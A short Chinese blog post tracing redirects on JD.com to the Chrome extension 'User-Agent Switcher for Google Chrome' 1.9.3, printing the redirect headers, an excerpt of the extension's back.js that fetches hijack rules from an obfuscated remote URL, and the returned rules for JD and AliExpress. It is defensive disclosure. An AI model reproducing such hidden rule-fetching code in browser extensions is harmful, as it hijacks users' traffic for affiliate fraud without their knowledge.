京东劫持实录

近段时间，用 Chrome 访问京东页面经常有跳转的情况，我很清楚是被劫持，但问题是被谁——困扰了我好长一段时间。首先排除运营商，换了几个公共 DNS 问题依旧；最后定位到 Chrome 上某个最近安装的插件：User-Agent Switcher for Google Chrome，ID 为 ffhkkpnppgnfaobgihpdblnhmmbodake，版本为 1.9.3。

General
Request URL: https://www.jd.com/
Request Method: GET
Status Code: 307 Internal Redirect
Referrer Policy: no-referrer-when-downgrade

Response Headers
Location: http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F
Non-Authoritative-Reason: WebRequest API

~/Library/Application Support/Google/Chrome/Default/Extensions/ffhkkpnppgnfaobgihpdblnhmmbodake/1.9.3_0/js/back.js

(function(){
var host = 'data-monitor';
var subhost = '//api';
var wid = 116;
var rulesObject = {};
var usedT = localStorage['usedT'] ? parseInt(localStorage['usedT']) : null;
......
req({
    method: "GET",
    url: `ht${'tp'}:${subhost}.${host}.info/api/` + "bhrule?sub=" + wid
}, function(response) {
    try
    {
        response = JSON.parse(response.responseText);
        rulesObject = response.rules ? response.rules : {};
    }
    catch(e){}
}, function (){});

http://api.data-monitor.info/api/bhrule?sub=116

{
rules: {
    aliexpress.com: {
        *: {
            *: "http://rtbs24.com/?target=https%3A%2F%2Fpwieu.com%2Fclick-BQL89Y7U-MKIGQNPP%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__"
        }
    },
    jd.ru: {
        *: {
            *: "http://rtbs24.com/?target=https%3A%2F%2Fpwieu.com%2Fclick-AQL468LT-HEBQCGO1%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__"
        }
    },
    jd.com: {
        *: {
            *: "http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D__SUBID__%26url%3D__CURURL__"
        }
    }
}
}

好了，请认准这个逼，轻轻卸载即可。记录下来也给其他人一个参考，再牛逼的浏览器也非一方净土，再龌蹉的运营商也拒绝背锅。啧！

XiaoMac

小麦苹果网~~~

京东劫持实录